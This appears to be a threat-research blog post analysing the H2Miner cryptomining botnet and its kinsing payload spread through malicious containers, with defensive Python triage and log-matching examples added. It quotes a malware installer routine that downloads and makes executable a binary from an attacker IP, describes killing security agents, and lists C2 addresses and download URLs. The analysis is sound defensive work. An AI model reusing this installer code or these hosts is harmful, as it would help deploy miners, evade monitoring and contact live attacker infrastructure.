H2Miner Botnet – Act 2
Chris Hall
Cloud Security Researcher, Lacework Labs
Containers are gaining popularity as malware deployment mechanisms in the cloud. Beginning on Valentine’s Day, one malicious container started making its rounds and has steadily expanded to over 350 infections. The malware and infrastructure have been attributed to the “H2Miner” cryptomining botnet which was last reported in January propagating via a Redis RCE: New Outbreak of h2Miner Worms Exploiting Redis RCE Detected.
Currently this activity is primarily targeting cloud servers in China. The following chart shows a breakdown of servers by organization. The vast majority belong to Chinese cloud providers such as Aliyun (Alibaba) and Tencent Cloud.
Figure 1. Bot Orgs
Figure 2. Botnet propagation
The malicious container was originally identified by searching on known malware artifacts in Shodan (https://www.shodan.io/search?query=%22217.12.221.244%22). As shown in Figure 3, there is an observable command that downloads a bash installer, which in turn preps the system and then tries to download the final cryptomining payload.
Figure 3. Container malware observed in Shodan
The installer will first attempt to remove competing cryptominers. It does this by grepping for other mining processes and network connections and terminating them if found. It will also attempt to avoid detection by uninstalling the monitoring agents for Tencent Cloud and Alibaba Cloud. The targeted removal of these security agents is likely one reason the infections are concentrated on Tencent and Alibaba cloud servers.
# excerpt from the installer; the [a] bracket keeps grep from matching its own command line
if ps aux | grep -i '[a]liyun'; then
The payload mining malware is known as “kinsing” and was previously reported on by Alibaba’s cloud security team. The installer downloads kinsing from one of two URLs and then verifies its md5 hash (a71ad3167f9402d8c5388910862b16ae). The following shows the portion of the installer that’s responsible for this:
download3() {
    # $WGET and $DIR are defined elsewhere in the installer (download command and install directory)
    $WGET $DIR/kinsing http://217.12.221.244/kinsing
    chmod +x $DIR/kinsing
    if [ -x "$(command -v md5sum)" ]; then
        # compare the md5 of the downloaded binary against the expected hash
        sum=$(md5sum $DIR/kinsing | awk '{ print $1 }')
        echo $sum
        case $sum in
            a71ad3167f9402d8c5388910862b16ae)
                echo "kinsing OK"
                ;;
            *)
                echo "kinsing wrong"
                ;;
        esac
    else
        echo "No md5sum"
    fi
}
In addition to cryptomining functionality, kinsing also has remote administration features with the ability to run additional malware. Kinsing is a 64-bit ELF executable coded in Golang. There are a total of 15 variants on VirusTotal with a wide range of detection ratios, between 3/61 and 27/61. (Note: these were found by searching on the artifact “main.minerRunning”, which is unique to kinsing.)
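A file-triage check built from the artifacts described above (the md5 the installer verifies, the main.minerRunning symbol, and the Hamlet padding discussed below), as an added example that is not part of the original post; the bytes it builds for itself are a constructed stand-in, not a real kinsing binary:

```python
import hashlib
from pathlib import Path

# Indicators taken from the post: the md5 the installer checks, the Go symbol
# unique to kinsing, and a line from the Hamlet text embedded in the binary.
KNOWN_KINSING_MD5 = "a71ad3167f9402d8c5388910862b16ae"
KINSING_GO_SYMBOL = b"main.minerRunning"
HAMLET_MARKER = b"Though this be madness"


def is_elf64(data: bytes) -> bool:
    """ELF magic followed by EI_CLASS == 2 (ELFCLASS64)."""
    return len(data) >= 5 and data[:4] == b"\x7fELF" and data[4] == 2


def triage_kinsing_candidate(data: bytes) -> dict:
    """The md5 catches only the build the installer ships; the Go symbol
    catches every variant, whatever padding (Hamlet or otherwise) shifts the hash."""
    md5 = hashlib.md5(data).hexdigest()
    elf64, has_symbol = is_elf64(data), KINSING_GO_SYMBOL in data
    if md5 == KNOWN_KINSING_MD5 or (elf64 and has_symbol):
        verdict = "kinsing"
    elif has_symbol:
        verdict = "review"      # symbol present but not a 64-bit ELF
    else:
        verdict = "clean"
    return {"elf64": elf64, "go_symbol": has_symbol, "hamlet_padding": HAMLET_MARKER in data,
            "md5": md5, "md5_known": md5 == KNOWN_KINSING_MD5, "verdict": verdict}


def triage_path(path: str) -> dict:
    return triage_kinsing_candidate(Path(path).read_bytes())


def build_constructed_sample(elf_class: int = 2, with_symbol: bool = True,
                             with_hamlet: bool = True) -> bytes:
    """Constructed stand-in, NOT a real kinsing sample: an ELF identification
    block followed by the strings a Go binary and the Hamlet padding would carry."""
    ident = b"\x7fELF" + bytes([elf_class, 1, 1]) + b"\x00" * 9
    body = b"\x00" * 16 + b"runtime.main\x00"
    if with_symbol:
        body += KINSING_GO_SYMBOL + b"\x00"
    if with_hamlet:
        body += HAMLET_MARKER + b", yet there is method in't.\n"
    return ident + body


if __name__ == "__main__":
    print(triage_kinsing_candidate(build_constructed_sample())["verdict"])  # kinsing
```

Run triage_path over the files an installer dropped into its working directory; a "review" verdict means the symbol was found in something other than a 64-bit ELF and deserves a manual look.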
All variants are hardcoded with the same C2 IPs:
Kinsing C2      | Country     | ASN
45.10.88.102    | Ukraine     | AS48693 Rices Privately owned enterprise
91.215.169.111  | Russia      | AS49693 Best-Hoster Group Co. Ltd.
139.99.50.255   | France      | AS16276 OVH SAS
46.243.253.167  | Netherlands | AS58272 LeaderTelecom B.V.
195.123.220.193 | Ukraine     | AS21100 ITL LLC
One odd artifact in the kinsing binary is the presence of Shakespeare’s Hamlet – all five Acts of the entire play. The reason for this is unclear; however, it may be an attempt to confuse analysts by adding noise, or a crude technique for avoiding hash-based detections.
Figure 4. Hamlet Artifacts: “Though this be madness, yet there is method in’t.”
The following are all known kinsing download URLs. The first two were observed in the most recent installer. All of the download URLs hosted on bitbucket are no longer online.
http://217.12.221.244/kinsing
https://bitbucket.org/kimganad81/git/raw/master/kinsing
http://142.44.191.122/kinsing
http://217.12.221.12/kinsing2
http://82.118.17.133/kinsing2
https://bitbucket.org/insane235n/git/raw/master/kinsing
https://bitbucket.org/orgaj125/git/raw/master/kinsing
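A defender-side match of the C2 table and the download URLs above against connection logs, as an added example that is not part of the original post; the key=value log format and every address in the sample other than the post's own indicators are constructed:

```python
import re
from urllib.parse import urlsplit

# C2 addresses and download URLs exactly as listed in the post.
KINSING_C2 = {"45.10.88.102", "91.215.169.111", "139.99.50.255",
              "46.243.253.167", "195.123.220.193"}
KINSING_DOWNLOAD_URLS = {
    "http://217.12.221.244/kinsing", "http://142.44.191.122/kinsing",
    "http://217.12.221.12/kinsing2", "http://82.118.17.133/kinsing2",
    "https://bitbucket.org/kimganad81/git/raw/master/kinsing",
    "https://bitbucket.org/insane235n/git/raw/master/kinsing",
    "https://bitbucket.org/orgaj125/git/raw/master/kinsing",
}
# Dedicated download hosts are indicators by themselves; bitbucket.org is
# shared infrastructure, so bitbucket downloads match only on the full URL.
DOWNLOAD_HOSTS = {urlsplit(u).hostname for u in KINSING_DOWNLOAD_URLS} - {"bitbucket.org"}

DST_RE = re.compile(r"\bdst=(\d{1,3}(?:\.\d{1,3}){3})\b")
URL_RE = re.compile(r"\burl=(\S+)")


def match_line(line: str) -> list:
    """Return (reason, indicator) pairs for one key=value log line."""
    hits = []
    m = DST_RE.search(line)
    if m and m.group(1) in KINSING_C2:
        hits.append(("kinsing C2", m.group(1)))
    elif m and m.group(1) in DOWNLOAD_HOSTS:
        hits.append(("kinsing download host", m.group(1)))
    m = URL_RE.search(line)
    if m and m.group(1) in KINSING_DOWNLOAD_URLS:
        hits.append(("kinsing download URL", m.group(1)))
    elif m and urlsplit(m.group(1)).hostname in DOWNLOAD_HOSTS:
        hits.append(("kinsing download host", urlsplit(m.group(1)).hostname))
    return hits


def scan_log(text: str) -> list:
    """(line_number, hits) for every line that matched at least one indicator."""
    return [(n, h) for n, l in enumerate(text.splitlines(), 1) if (h := match_line(l))]


# Constructed sample log; only the indicator values in it come from the post.
SAMPLE_LOG = """\
2020-03-02T04:11:09Z src=10.0.0.5 dst=217.12.221.244 url=http://217.12.221.244/kinsing
2020-03-02T04:11:15Z src=10.0.0.5 dst=45.10.88.102 dport=80
2020-03-02T04:12:00Z src=10.0.0.5 dst=198.51.100.20 url=https://bitbucket.org/kimganad81/git/raw/master/kinsing
2020-03-02T04:12:30Z src=10.0.0.5 dst=198.51.100.20 url=https://bitbucket.org/someteam/repo/raw/master/README
2020-03-02T04:13:00Z src=10.0.0.7 dst=192.0.2.10 url=http://192.0.2.10/index.html
"""
```

Note that the fourth sample line, an unrelated bitbucket download, produces no hit, which is the point of keeping bitbucket.org out of the host set.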
Additional insight into the botnet was obtained by running the IPs through Greynoise. Greynoise is a useful search API that provides context on IPs that is unavailable elsewhere. As shown in Figure 5, several of the IPs running the containers were tagged as “Dockerd scanners” and “Kubernetes crawlers.”
Lacework believes the hosts installed with kinsing were subsequently recruited as scanners by the botnet for self-propagation purposes. While the specific propagation technique was not observed, it’s possibly leveraging the same Redis RCE from January. This is supported by the “Redis Scanner” tag which was the third most common among the hosts.
Figure 5. Greynoise Tags
Cryptominers will likely expand their exploitation of cloud resources, especially during this unstable global economy. This has the potential to exacerbate the strain on cloud resources as more people are now working from home. Fortunately, the installation of these programs can easily be detected and mitigated with cloud security agents such as those provided by Lacework and other vendors.
The following is a sampling of indicators. For a complete list, check out our GitHub repository: https://github.com/lacework/lacework-labs/blob/master/blog/h2miner.csv